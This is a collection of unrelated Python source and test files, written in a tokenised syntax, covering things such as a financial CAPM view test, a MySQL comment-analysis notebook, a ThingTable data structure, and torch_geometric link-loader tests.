# IMPORTATION STANDARD # IMPORTATION THIRDPARTY <import_stmt>pytest<line_sep># IMPORTATION INTERNAL <import_from_stmt>gamestonk_terminal.stocks.quantitative_analysis factors_view<line_sep>@pytest.fixture(scope="module")<def_stmt>vcr_config <block_start><return>{"filter_headers":[("User-Agent" <none>)] "filter_query_parameters":[("period1" "1598220000") ("period2" "1635980400") ] }<block_end>@pytest.mark.vcr@pytest.mark.record_stdout<def_stmt>test_capm_view <block_start>factors_view.capm_view(ticker="PM")<block_end>
<import_from_future_stmt> print_function<line_sep># coding: utf-8 # In[1]: <import_from_stmt>builtins zip<line_sep>get_ipython().magic(u'matplotlib inline')<import_stmt>MySQLdb<import_stmt>pandas<as>pd<import_stmt>matplotlib<import_stmt>matplotlib.pyplot<as>plt<line_sep>plt.rcParams["figure.figsize"]=[20 12]<line_sep># In[2]: conn=MySQLdb.connect(host='localhost' user='root' passwd='<PASSWORD>' db='wikumnewdb')<line_sep>cursor=conn.cursor()<line_sep># In[3]: cursor.execute("select text, username, website_comment.created_at, url from website_opencomment INNER JOIN website_article on website_opencomment.article_id = website_article.id INNER JOIN website_commentauthor on website_opencomment.author_id = website_commentauthor.id INNER JOIN website_comment on website_opencomment.comment_id = website_comment.id")<line_sep>rows=cursor.fetchall()<line_sep># In[9]: # How many RfCs are opened per month? open_dates=[data[2]<for>data rows]<line_sep>df=pd.DataFrame(index=open_dates)<line_sep>df['count']=[1]<times>len(open_dates)<line_sep>resampled_df=df.resample('1M' label='right').sum()<line_sep># In[5]: fig,ax=plt.subplots()<line_sep>ax.plot(resampled_df.index resampled_df['count'])<line_sep>fig.suptitle('RfCs initiated' fontsize=20 fontweight='bold' y=0.05)<line_sep>years=plt.matplotlib.dates.YearLocator()<line_sep>months=plt.matplotlib.dates.MonthLocator(interval=3)<line_sep>yearsFmt=plt.matplotlib.dates.DateFormatter('%Y')<line_sep>monthsFmt=plt.matplotlib.dates.DateFormatter('%b')<line_sep>ax.xaxis.set_major_locator(years)<line_sep>ax.xaxis.set_major_formatter(yearsFmt)<line_sep>ax.xaxis.set_minor_locator(months)<line_sep>ax.xaxis.set_minor_formatter(monthsFmt)<line_sep>ax.set_xlabel("Date")<line_sep>ax.set_ylabel("Number of RfCs initiated")<line_sep>ax.xaxis.grid(<true>)<line_sep>ax.yaxis.grid(<true>)<line_sep>labels=ax.get_xticklabels()#"both" gives ugly formatting plt.setp(labels rotation=30 fontsize=15)<for_stmt>xy zip(resampled_df.index resampled_df['count'])<block_start>ax.annotate(xy[1] xy=xy textcoords='data')<block_end>plt.show()<line_sep># In[6]: # Maximum RfCs initiated in a month resampled_df.idxmax()<line_sep>resampled_df.max()<line_sep>print(int(resampled_df.max()))<line_sep># In[7]: # Top openers df=pd.DataFrame([[ij<for>ij i]<for>i rows])<line_sep>df.rename(columns={0:'text' 1:'user name' 2:'date' 3:'url'} inplace=<true>)<line_sep>opening_counts=pd.DataFrame(df.groupby('user name').size().rename('total openings'))<line_sep>opening_counts.sort_values(by='total openings' ascending=<false> inplace=<true>)<line_sep>opening_counts.iloc[0:30]<line_sep># In[ ]:
<import_stmt>re<import_stmt>matplotlib<import_stmt>matplotlib.cm<as>cm<import_stmt>matplotlib.patches<as>mpatches<import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<line_sep># Regex used to match relevant loglines (in this case, a specific IP address) line_regex=re.compile(r".*$")<def_stmt>get_experiment_results log_file match_function<block_start>results=[]<with_stmt>open(log_file "r")<as>in_file<block_start><for_stmt>line in_file<block_start><if_stmt>(line_regex.search(line))<block_start>match=match_function(line)<if_stmt>match<is><not><none><block_start>results.append(match)<block_end><block_end><block_end><block_end><return>results<block_end><def_stmt>extract_from_worker s from_worker<block_start>pattern=re.compile(r"\[.*/0"+str(from_worker)+r"/.*\].*" re.VERBOSE)<line_sep>match=pattern.match(s)<if_stmt>match<is><none><block_start><return><none><block_end><return>s<block_end><def_stmt>print_none_match pattern l<block_start>print(pattern.pattern)<line_sep><raise>Exception(l)<block_end><def_stmt>get_loss s<block_start>pattern=re.compile(r".*\)\t(?P<loss>\d+\.\d+)\t.*" re.VERBOSE)<line_sep>match=pattern.match(s)<if_stmt>match<is><none><block_start><return><none><block_end><return>float(match.group("loss"))<block_end><def_stmt>get_noise s<block_start>pattern=re.compile(r".*iteration\[(?P<noise>[\-\+]?\d+\.\d+)\]\n" re.VERBOSE)<line_sep>match=pattern.match(s)<if_stmt>match<is><none><block_start><return><none><block_end><return>float(match.group("noise"))<block_end><def_stmt>plot lines<block_start>losses=[get_loss(l)<for>l lines]<line_sep>losses=filter(<none> losses)<line_sep>noises=[get_noise(l)<for>l lines]<line_sep>noises=filter(<none> noises)<line_sep>pairs=zip(losses noises)<line_sep>pairs.sort(key=<lambda>x:x[0])<line_sep>print(pairs)<line_sep>losses,noises=zip(*pairs)<line_sep>plt.ylim([-200000 200000])<line_sep>plt.title('ResNet-32 gradient noise scale')<line_sep>plt.ylabel('Gradient Noise')<line_sep>plt.xlabel('Training Loss')<line_sep>plt.plot(losses noises)<line_sep>plt.show()<block_end><def_stmt>main <block_start>num_workers=1<line_sep>workers=[]<for_stmt>worker range(num_workers)<block_start>worker=get_experiment_results('./correctnoise-tensorboard.log' <lambda>x:extract_from_worker(x worker))<line_sep>workers.append(worker)<block_end><for_stmt>worker_logs workers<block_start>plot(worker_logs)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
# Assign functions to a variable <def_stmt>add a b<block_start><return>a+b<block_end>plus=add<line_sep>value=plus(1 2)<line_sep>print(value)# 3 # Lambda value=(<lambda>a b:a+b)(1 2)<line_sep>print(value)# 3 addition=<lambda>a b:a+b<line_sep>value=addition(1 2)<line_sep>print(value)# 3 authors=['<NAME>' '<NAME>' '<NAME>' '<NAME>' '<NAME>' '<NAME>']<line_sep>sorted_authors_by_name_length=sorted(authors key=len)<line_sep>print(sorted_authors_by_name_length)<line_sep>sorted_authors_by_last_name=sorted(authors key=<lambda>name:name.split()[-1])<line_sep>print(sorted_authors_by_last_name)<line_sep>
<import_stmt>tensorflow<as>tf<import_from_stmt>dltk.core.activations leaky_relu<import_stmt>numpy<as>np<def_stmt>test_leaky_relu <block_start>test_alpha=tf.constant(0.1)<line_sep>test_inp_1=tf.constant(1.)<line_sep>test_inp_2=tf.constant(-1.)<line_sep>test_relu_1=leaky_relu(test_inp_1 test_alpha)<line_sep>test_relu_2=leaky_relu(test_inp_2 test_alpha)<with_stmt>tf.Session()<as>s<block_start>out_1=s.run(test_relu_1)<assert_stmt>np.isclose(out_1 1.) 'Got {} but expected {}'.format(out_1 1.)<line_sep>out_2=s.run(test_relu_2)<assert_stmt>np.isclose(out_2 -0.1) 'Got {} but expected {}'.format(out_2 -0.1)<block_end><block_end>
# # Copyright (c) 2021 IBM Corp. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # <import_stmt>textwrap<line_sep># # thing_table.py # # Part of text_extensions_for_pandas # # Data structure for managing collections of immutable items that implement # __hash__ and __eq__. Serves as a base class for StringTable # <import_from_stmt>abc ABC abstractmethod<import_from_stmt>typing *<import_stmt>numpy<as>np<class_stmt>ThingTable(ABC)<block_start>""" A set of immutable things, plus integer IDs for said things. Also implicitly maps `None` to ID -1. Serves as a base class for collections of specific things like strings and tokenizations. """<line_sep># Special integer ID for None as a thing. NONE_ID=-1<line_sep># Special integer ID for "not an id" NOT_AN_ID=-2<def_stmt>__init__ self# Bidirectional map from unique thing (possibly boxed for dictionary # compatibility) to integer ID and back <block_start>self._boxed_thing_to_id={}# type: Dict[Any, int] self._id_to_boxed_thing=[]# type: List[Any] self._total_bytes=0<block_end># type: int @abstractmethod<def_stmt>size_of_thing self thing:Any<arrow>int<block_start>""" :param thing: Thing to be insterted in this table :return: The number of bytes that the thing occupies in memory """<line_sep><pass><block_end>@abstractmethod<def_stmt>type_of_thing self<arrow>Type<block_start>""" :return: Expected type of things that this table will manage """<line_sep><pass><block_end><def_stmt>box self thing:Any<arrow>Any<block_start>""" Subclasses should override this method if they manage items that aren't compatible with Python dictionaries. :param thing: Thing to insert into the table :return: a dictionary-compatible boxed version of `thing`, if such boxing is needed to make `thing` dictionary-compatible. """<line_sep># Default implementation is a no-op <return>thing<block_end><def_stmt>unbox self boxed_thing:Any<arrow>Any<block_start>""" Subclasses should override this method if they manage items that aren't compatible with Python dictionaries. :param boxed_thing: Thing that was boxed by this class's `box` method. :return: Original thing that was passed to `box` """<line_sep># Default implementation is a no-op <return>boxed_thing<block_end>@classmethod<def_stmt>create_single cls thing:Any<block_start>""" Factory method for building a table containing a single value at ID 0. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. """<line_sep># For now we return a fresh table each time. ret=cls()<line_sep>ret.maybe_add_thing(thing)<line_sep><return>ret<block_end>@classmethod<def_stmt>merge_tables_and_ids cls tables:Sequence["ThingTable"] int_ids:Sequence[np.ndarray]<arrow>Tuple["ThingTable" np.ndarray]<block_start>""" Factory method for combining together multiple references to different ThingTables into references to a new, combined ThingTable of the same type. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. :param tables: A list of (possibly) different mappings from int to string :param int_ids: List of lists of integer IDs that decode to strings via the corresponding elements of `tables`. :returns: A tuple containing: * A new, merged table containing all the unique things under `tables` that are referenced in `int_ids` (and possibly additional things that aren't referenced) * Numpy arrays of integer offsets into the new table, corresponding to the elements of `int_ids` """<if_stmt>len(tables)<ne>len(int_ids)<block_start><raise>ValueError(f"Got {len(tables)} {cls}s "<concat>f"and {len(int_ids)} lists of IDs.")<block_end># TODO: Add fast-path code here to pass through the first table if # both input tables are identical. new_table=cls()<line_sep>new_ids_list=[]<for_stmt>i range(len(tables))<block_start>old_table=tables[i]<if_stmt><not>isinstance(old_table cls)<block_start><raise>TypeError(f"Expected table of type {cls}, but got "<concat>f"{type(old_table)}")<block_end>old_ids=int_ids[i]<if_stmt>len(old_ids.shape)<ne>1<block_start><raise>ValueError(f"Invalid shape for IDs {old_ids}")<block_end>new_ids=np.empty_like(old_ids dtype=int)<line_sep>old_id_to_new_id=[new_table.maybe_add_thing(old_table.id_to_thing(j))<for>j range(old_table.num_things)]<for_stmt>j range(len(old_ids))<block_start>new_ids[j]=old_id_to_new_id[old_ids[j]]<block_end>new_ids_list.append(new_ids)<block_end><return>new_table new_ids_list<block_end>@classmethod<def_stmt>merge_things cls things:Union[Sequence[Any] np.ndarray]<block_start>f""" Factory method for bulk-adding multiple things to create a single ThingTable and a list of integer IDs against that ThingTable. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. :param things: things to be de-duplicated and converted to a ThingTable. :returns: Two values: * A ThingTable containing (at least) all the unique strings in `strings` * A Numppy array of integer string IDs against the returned ThingTable, where each ID maps to the corresponding element of `strings` """<line_sep>new_table=cls()<line_sep>str_ids=np.empty(len(things) dtype=int)<for_stmt>i range(len(things))<block_start>str_ids[i]=new_table.maybe_add_thing(things[i])<block_end><return>new_table str_ids<block_end>@classmethod<def_stmt>from_things cls things:Union[Sequence[Any] np.ndarray]<block_start>""" Factory method for creating a ThingTable from a sequence of unique things. :param things: sequence of unique things to be added to the ThingTable. :return: A ThingTable containing the elements of `things`. """<line_sep>new_table=cls()<for_stmt>thing things<block_start>new_table.add_thing(thing)<block_end><return>new_table<block_end><def_stmt>thing_to_id self thing:Any<arrow>int<block_start>""" :param thing: A thing to look up in this table :returns: One of: * The integer ID of the indicated thing, if present. * `ThingTable.NONE_ID` if thing is None * `ThingTable.NOT_AN_ID` if thing is not present in the table """<if_stmt>thing<is><none># By convention, None maps to -1 <block_start><return>ThingTable.NONE_ID<block_end><elif_stmt><not>isinstance(thing self.type_of_thing())<block_start><raise>TypeError(f"Expected an object of type {self.type_of_thing()}, "<concat>f"but received an object of type {type(thing)}")<block_end><else_stmt># Remaining branches require boxing for dictionary lookup <block_start>boxed_thing=self.box(thing)<if_stmt>boxed_thing<not><in>self._boxed_thing_to_id<block_start><return>ThingTable.NOT_AN_ID<block_end><else_stmt><block_start><return>self._boxed_thing_to_id[boxed_thing]<block_end><block_end><block_end><def_stmt>id_to_thing self int_id:Union[int np.int64 np.int32]<arrow>Any<block_start>""" :param int_id: Integer ID that is potentially associated with a thing in the table :return: The associated thing, if present, or `None` if no thing is associated with the indicated ID. """<if_stmt><not>isinstance(int_id (int np.int64 np.int32))<block_start><raise>TypeError(f"Expected integer, but received {int_id} "<concat>f"of type {type(int_id)}")<block_end><elif_stmt>int_id<le>ThingTable.NOT_AN_ID<block_start><raise>ValueError(f"Invalid ID {int_id}")<block_end><elif_stmt>ThingTable.NONE_ID<eq>int_id<block_start><return><none><block_end><else_stmt><block_start>boxed_thing=self._id_to_boxed_thing[int_id]<line_sep><return>self.unbox(boxed_thing)<block_end><block_end><def_stmt>ids_to_things self int_ids:Union[Sequence[int] np.ndarray]<arrow>np.ndarray<block_start>""" Vectorized version of :func:`id_to_string` for translating multiple IDs at once. :param int_ids: Multiple integer IDs to be translated to strings :returns: A numpy array of string objects. """<if_stmt><not>isinstance(int_ids np.ndarray)<block_start>int_ids=np.array(int_ids dtype=int)<block_end><if_stmt>len(int_ids.shape)<ne>1<block_start><raise>TypeError(f"Invalid shape {int_ids.shape} for array of integer IDs.")<block_end>ret=np.empty(len(int_ids) dtype=object)<for_stmt>i range(len(int_ids))<block_start>ret[i]=self.id_to_thing(int_ids[i].item())<block_end><return>ret<block_end><def_stmt>add_thing self thing:Any<arrow>int<block_start>""" Adds a thing to the table. Raises a ValueError if the thing is already present. :param thing: Thing to add :return: unique ID for this thing """<if_stmt><not>isinstance(thing self.type_of_thing())<block_start><raise>TypeError(f"Expected an object of type {self.type_of_thing()}, "<concat>f"but received an object of type {type(thing)}")<block_end># Box for dictionary compatibility boxed_thing=self.box(thing)<if_stmt>boxed_thing<in>self._boxed_thing_to_id<block_start><raise>ValueError(f"'{textwrap.shorten(str(thing) 40)}' already in table")<block_end>new_id=len(self._id_to_boxed_thing)<line_sep>self._id_to_boxed_thing.append(boxed_thing)<line_sep>self._boxed_thing_to_id[boxed_thing]=new_id<line_sep>self._total_bytes<augadd>self.size_of_thing(thing)<line_sep><return>new_id<block_end><def_stmt>maybe_add_thing self thing:Any<arrow>int<block_start>""" Adds a thing to the table if it is not already present. :param thing: Thing to add :return: unique ID for this thing """<if_stmt><not>isinstance(thing self.type_of_thing())<block_start><raise>TypeError(f"Expected an object of type {self.type_of_thing()}, "<concat>f"but received an object of type {type(thing)}")<block_end>current_id=self.thing_to_id(thing)<if_stmt>current_id<ne>ThingTable.NOT_AN_ID<block_start><return>current_id<block_end><else_stmt><block_start><return>self.add_thing(thing)<block_end><block_end><def_stmt>maybe_add_things self s:Sequence[Any]<arrow>np.ndarray<block_start>""" Vectorized version of :func:`maybe_add_thing` for translating, and potentially adding multiple things at once. :param s: Multiple things to be translated and potentially added :returns: A numpy array of the corresponding integer IDs for the things. Adds each things to the table if it is not already present. """<line_sep>result=np.empty(len(s) dtype=np.int32)<for_stmt>i range(len(result))<block_start>result[i]=self.maybe_add_thing(s[i])<block_end><return>result<block_end><def_stmt>nbytes self<block_start>""" Number of bytes in a (currently hypothetical) serialized version of this table. """<line_sep><return>self._total_bytes<block_end>@property<def_stmt>num_things self<arrow>int<block_start>""" :return: Number of distinct things in the table """<line_sep><return>len(self._id_to_boxed_thing)<block_end>@property<def_stmt>things self<arrow>Iterator[Any]<block_start>""" :return: Iterator over the unique things stored in this table. """<line_sep><return>(self.unbox(thing)<for>thing self._id_to_boxed_thing)<block_end>@property<def_stmt>ids self<arrow>Iterator[int]<block_start>""" :return: Iterator over the IDs of things stored in this table, including the implicit ID ThingTable.NONE_ID """<if_stmt>ThingTable.NONE_ID<ne>-1<block_start><raise>ValueError("Someone has changed the value of NONE_ID; need to rewrite "<concat>"this function.")<block_end><return>range(-1 len(self._id_to_boxed_thing))<block_end><def_stmt>things_to_ids self things:Sequence[Any]<arrow>np.ndarray<block_start>""" Vectorized version of :func:`thing_to_id` for translating multiple things at once. :param things: Multiple things to be translated to IDs. Must be already in the table's set of things. :returns: A numpy array of the same integers that :func:`thing_to_id` would return. """<line_sep>ret=np.empty(len(things) dtype=np.int32)<for_stmt>i range(len(things))<block_start>ret[i]=self.thing_to_id(things[i])<block_end><return>ret<block_end><block_end>
<import_from_stmt>rest_framework serializers<import_from_stmt>openbook_categories.models Category<class_stmt>GetCategoriesCategorySerializer(serializers.ModelSerializer)<block_start><class_stmt>Meta<block_start>model=Category<line_sep>fields=('id' 'name' 'title' 'description' 'avatar' 'color')<block_end><block_end>
<def_stmt>iob_ranges words tags<block_start>""" IOB -> Ranges """<assert_stmt>len(words)<eq>len(tags)<line_sep>ranges=[]<def_stmt>check_if_closing_range <block_start><if_stmt>i<eq>len(tags)-1<or>tags[i+1].split('_')[0]<eq>'O'<block_start>ranges.append({'entity':''.join(words[begin:i+1]) 'type':temp_type 'start':begin 'end':i})<block_end><block_end><for_stmt>i,tag enumerate(tags)<block_start><if_stmt>tag.split('_')[0]<eq>'O'<block_start><pass><block_end><elif_stmt>tag.split('_')[0]<eq>'B'<block_start>begin=i<line_sep>temp_type=tag.split('_')[1]<line_sep>check_if_closing_range()<block_end><elif_stmt>tag.split('_')[0]<eq>'I'<block_start>check_if_closing_range()<block_end><block_end><return>ranges<block_end>
<import_from_stmt>unittest.mock patch<import_from_stmt>django.test TestCase<import_stmt>vcr<import_from_stmt>data_refinery_common.models Contribution Experiment ExperimentSampleAssociation OntologyTerm Sample SampleAttribute <import_from_stmt>data_refinery_foreman.foreman.management.commands.import_external_sample_attributes Command import_metadata import_sample_attributes <line_sep>TEST_METADATA="/home/user/data_store/externally_supplied_metadata/test_data/metadata.json"<class_stmt>ImportExternalSampleAttributesTestCase(TestCase)<block_start><def_stmt>setUp self<block_start>experiment=Experiment()<line_sep>experiment.accession_code="GSE000"<line_sep>experiment.alternate_accession_code="E-GEOD-000"<line_sep>experiment.title="NONONONO"<line_sep>experiment.description="Boooooourns. Wasabi."<line_sep>experiment.technology="RNA-SEQ"<line_sep>experiment.save()<line_sep>self.experiment=experiment<line_sep># Create some samples to attach metadata to sample=Sample()<line_sep>sample.accession_code="SRR123"<line_sep>sample.technology="RNA-SEQ"<line_sep>sample.source_database="SRA"<line_sep>sample.title="Not important"<line_sep>sample.save()<line_sep>experiment_sample_association=ExperimentSampleAssociation()<line_sep>experiment_sample_association.sample=sample<line_sep>experiment_sample_association.experiment=experiment<line_sep>experiment_sample_association.save()<line_sep>sample2=Sample()<line_sep>sample2.accession_code="SRR456"<line_sep>sample2.technology="RNA-SEQ"<line_sep>sample2.source_database="SRA"<line_sep>sample2.title="Not important"<line_sep>sample2.save()<line_sep>experiment_sample_association=ExperimentSampleAssociation()<line_sep>experiment_sample_association.sample=sample2<line_sep>experiment_sample_association.experiment=experiment<line_sep>experiment_sample_association.save()<line_sep># Create the ontology terms I'm using in the tests name=OntologyTerm()<line_sep>name.ontology_term="PATO:0000122"<line_sep>name.human_readable_name="length"<line_sep>name.save()<line_sep>unit=OntologyTerm()<line_sep>unit.ontology_term="UO:0010012"<line_sep>unit.human_readable_name="thou"<line_sep>unit.save()<line_sep>contribution=Contribution()<line_sep>contribution.source_name="refinebio_tests"<line_sep>contribution.methods_url="ccdatalab.org"<line_sep>contribution.save()<line_sep>self.contribution=contribution<block_end># # Test import_sample_attributes() # <def_stmt>test_skip_unknown_sample self<block_start>"""Make sure that if someone has metadata for a sample that we haven't surveyed then we just do nothing"""<line_sep>METADATA=[{"PATO:0000122":{"value":25 "unit":"UO:0010012"}}]<line_sep>import_sample_attributes("SRR789" METADATA self.contribution)<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 0)<block_end><def_stmt>test_import_invalid_ontology_term self<block_start>METADATA=[{"PATO:0000122":{"value":25 "unit":"thou"}}]<line_sep>self.assertRaises(ValueError import_sample_attributes "SRR123" METADATA self.contribution)<line_sep>METADATA=[{"length":{"value":25 "unit":"UO:0010012"}}]<line_sep>self.assertRaises(ValueError import_sample_attributes "SRR123" METADATA self.contribution)<block_end><def_stmt>test_import_valid_sample_attributes self<block_start>METADATA=[{"PATO:0000122":{"value":25 "unit":"UO:0010012"}}]<line_sep>import_sample_attributes("SRR123" METADATA self.contribution)<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 1)<line_sep>contributed_metadata=Sample.objects.get(accession_code="SRR123").contributed_metadata<line_sep>self.assertEqual(contributed_metadata[self.contribution.source_name]["length"] {"unit":"thou" "value":25} )<block_end># # Test import_metadata() # <def_stmt>test_import_valid_metadata self<block_start>METADATA=[{"sample_accession":"SRR123" "attributes":[{"PATO:0000122":{"value":25 "unit":"UO:0010012"}}] }]<line_sep>import_metadata(METADATA self.contribution)<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 1)<line_sep>contributed_metadata=Sample.objects.get(accession_code="SRR123").contributed_metadata<line_sep>self.assertEqual(contributed_metadata[self.contribution.source_name]["length"] {"unit":"thou" "value":25} )<block_end># # End-to-end test # @vcr.use_cassette("/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml")<def_stmt>test_management_command self<block_start>sample=Sample()<line_sep>sample.accession_code="DRR001173"<line_sep>sample.technology="RNA-SEQ"<line_sep>sample.source_database="SRA"<line_sep>sample.title="Not important"<line_sep>sample.save()<line_sep>command=Command()<line_sep>SOURCE_NAME="refinebio_tests"<line_sep>command.handle(file=TEST_METADATA source_name=SOURCE_NAME methods_url="ccdatalab.org")<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 1)<line_sep>contributed_metadata=sample.contributed_metadata<line_sep>self.assertEqual(set(contributed_metadata[SOURCE_NAME]["biological sex"].keys()) {"value" "confidence"} )<line_sep>self.assertEqual(contributed_metadata[SOURCE_NAME]["biological sex"]["value"].human_readable_name "female" )<line_sep>self.assertAlmostEqual(contributed_metadata[SOURCE_NAME]["biological sex"]["confidence"] 0.7856624891880539)<block_end><block_end>
<import_from_stmt>io StringIO<import_from_stmt>django.core.management call_command<import_from_stmt>django.core.management.base CommandError<import_from_stmt>django.test TestCase<import_from_stmt>flags.state flag_enabled<class_stmt>EnableFlagTestCase(TestCase)<block_start><def_stmt>test_enable_flag self<block_start>out=StringIO()<line_sep>self.assertFalse(flag_enabled("DB_FLAG"))<line_sep>call_command("enable_flag" "DB_FLAG" stdout=out)<line_sep>self.assertTrue(flag_enabled("DB_FLAG"))<line_sep>self.assertIn("Successfully enabled" out.getvalue())<block_end><def_stmt>test_enable_flag_non_existent_flag self<block_start><with_stmt>self.assertRaises(CommandError)<block_start>call_command("enable_flag" "FLAG_DOES_NOT_EXIST")<block_end><block_end><block_end>
<import_stmt>pytest<import_stmt>torch<import_from_stmt>torch_geometric.data Data HeteroData<import_from_stmt>torch_geometric.loader LinkNeighborLoader<def_stmt>get_edge_index num_src_nodes num_dst_nodes num_edges<block_start>row=torch.randint(num_src_nodes (num_edges ) dtype=torch.long)<line_sep>col=torch.randint(num_dst_nodes (num_edges ) dtype=torch.long)<line_sep><return>torch.stack([row col] dim=0)<block_end><def_stmt>unique_edge_pairs edge_index<block_start><return>set(map(tuple edge_index.t().tolist()))<block_end>@pytest.mark.parametrize('directed' [<true> <false>])@pytest.mark.parametrize('neg_sampling_ratio' [0.0 1.0])<def_stmt>test_homogeneous_link_neighbor_loader directed neg_sampling_ratio<block_start>torch.manual_seed(12345)<line_sep>pos_edge_index=get_edge_index(100 50 500)<line_sep>neg_edge_index=get_edge_index(100 50 500)<line_sep>neg_edge_index[1 :]<augadd>50<line_sep>edge_label_index=torch.cat([pos_edge_index neg_edge_index] dim=-1)<line_sep>edge_label=torch.cat([torch.ones(500) torch.zeros(500)] dim=0)<line_sep>data=Data()<line_sep>data.edge_index=pos_edge_index<line_sep>data.x=torch.arange(100)<line_sep>data.edge_attr=torch.arange(500)<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 batch_size=20 edge_label_index=edge_label_index edge_label=edge_label<if>neg_sampling_ratio<eq>0.0<else><none> directed=directed neg_sampling_ratio=neg_sampling_ratio shuffle=<true> )<assert_stmt>str(loader)<eq>'LinkNeighborLoader()'<assert_stmt>len(loader)<eq>1000/20<for_stmt>batch loader<block_start><assert_stmt>isinstance(batch Data)<assert_stmt>len(batch)<eq>5<assert_stmt>batch.x.size(0)<le>100<assert_stmt>batch.x.min()<ge>0<and>batch.x.max()<l>100<assert_stmt>batch.edge_index.min()<ge>0<assert_stmt>batch.edge_index.max()<l>batch.num_nodes<assert_stmt>batch.edge_attr.min()<ge>0<assert_stmt>batch.edge_attr.max()<l>500<if_stmt>neg_sampling_ratio<eq>0.0<block_start><assert_stmt>batch.edge_label_index.size(1)<eq>20<line_sep># Assert positive samples are present in the original graph: edge_index=unique_edge_pairs(batch.edge_index)<line_sep>edge_label_index=batch.edge_label_index[: batch.edge_label<eq>1]<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index|edge_label_index)<eq>len(edge_index)<line_sep># Assert negative samples are not present in the original graph: edge_index=unique_edge_pairs(batch.edge_index)<line_sep>edge_label_index=batch.edge_label_index[: batch.edge_label<eq>0]<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index&edge_label_index)<eq>0<block_end><else_stmt><block_start><assert_stmt>batch.edge_label_index.size(1)<eq>40<assert_stmt>torch.all(batch.edge_label[:20]<eq>1)<assert_stmt>torch.all(batch.edge_label[20:]<eq>0)<block_end><block_end><block_end>@pytest.mark.parametrize('directed' [<true> <false>])@pytest.mark.parametrize('neg_sampling_ratio' [0.0 1.0])<def_stmt>test_heterogeneous_link_neighbor_loader directed neg_sampling_ratio<block_start>torch.manual_seed(12345)<line_sep>data=HeteroData()<line_sep>data['paper'].x=torch.arange(100)<line_sep>data['author'].x=torch.arange(100 300)<line_sep>data['paper' 'paper'].edge_index=get_edge_index(100 100 500)<line_sep>data['paper' 'paper'].edge_attr=torch.arange(500)<line_sep>data['paper' 'author'].edge_index=get_edge_index(100 200 1000)<line_sep>data['paper' 'author'].edge_attr=torch.arange(500 1500)<line_sep>data['author' 'paper'].edge_index=get_edge_index(200 100 1000)<line_sep>data['author' 'paper'].edge_attr=torch.arange(1500 2500)<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 edge_label_index=('paper' 'author') batch_size=20 directed=directed neg_sampling_ratio=neg_sampling_ratio shuffle=<true> )<assert_stmt>str(loader)<eq>'LinkNeighborLoader()'<assert_stmt>len(loader)<eq>1000/20<for_stmt>batch loader<block_start><assert_stmt>isinstance(batch HeteroData)<if_stmt>neg_sampling_ratio<eq>0.0<block_start><assert_stmt>len(batch)<eq>4<line_sep># Assert positive samples are present in the original graph: edge_index=unique_edge_pairs(batch['paper' 'author'].edge_index)<line_sep>edge_label_index=batch['paper' 'author'].edge_label_index<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index|edge_label_index)<eq>len(edge_index)<block_end><else_stmt><block_start><assert_stmt>len(batch)<eq>5<assert_stmt>batch['paper' 'author'].edge_label_index.size(1)<eq>40<assert_stmt>torch.all(batch['paper' 'author'].edge_label[:20]<eq>1)<assert_stmt>torch.all(batch['paper' 'author'].edge_label[20:]<eq>0)<block_end><block_end><block_end>@pytest.mark.parametrize('directed' [<true> <false>])<def_stmt>test_heterogeneous_link_neighbor_loader_loop directed<block_start>torch.manual_seed(12345)<line_sep>data=HeteroData()<line_sep>data['paper'].x=torch.arange(100)<line_sep>data['author'].x=torch.arange(100 300)<line_sep>data['paper' 'paper'].edge_index=get_edge_index(100 100 500)<line_sep>data['paper' 'author'].edge_index=get_edge_index(100 200 1000)<line_sep>data['author' 'paper'].edge_index=get_edge_index(200 100 1000)<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 edge_label_index=('paper' 'paper') batch_size=20 directed=directed)<for_stmt>batch loader<block_start><assert_stmt>batch['paper'].x.size(0)<le>100<assert_stmt>batch['paper'].x.min()<ge>0<and>batch['paper'].x.max()<l>100<line_sep># Assert positive samples are present in the original graph: edge_index=unique_edge_pairs(batch['paper' 'paper'].edge_index)<line_sep>edge_label_index=batch['paper' 'paper'].edge_label_index<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index|edge_label_index)<eq>len(edge_index)<block_end><block_end><def_stmt>test_link_neighbor_loader_edge_label <block_start>torch.manual_seed(12345)<line_sep>edge_index=get_edge_index(100 100 500)<line_sep>data=Data(edge_index=edge_index x=torch.arange(100))<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 batch_size=10 neg_sampling_ratio=1.0 )<for_stmt>batch loader<block_start><assert_stmt>batch.edge_label.dtype<eq>torch.float<assert_stmt>torch.all(batch.edge_label[:10]<eq>1.0)<assert_stmt>torch.all(batch.edge_label[10:]<eq>0.0)<block_end>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 batch_size=10 edge_label=torch.ones(500 dtype=torch.long) neg_sampling_ratio=1.0 )<for_stmt>batch loader<block_start><assert_stmt>batch.edge_label.dtype<eq>torch.long<assert_stmt>torch.all(batch.edge_label[:10]<eq>2)<assert_stmt>torch.all(batch.edge_label[10:]<eq>0)<block_end><block_end>
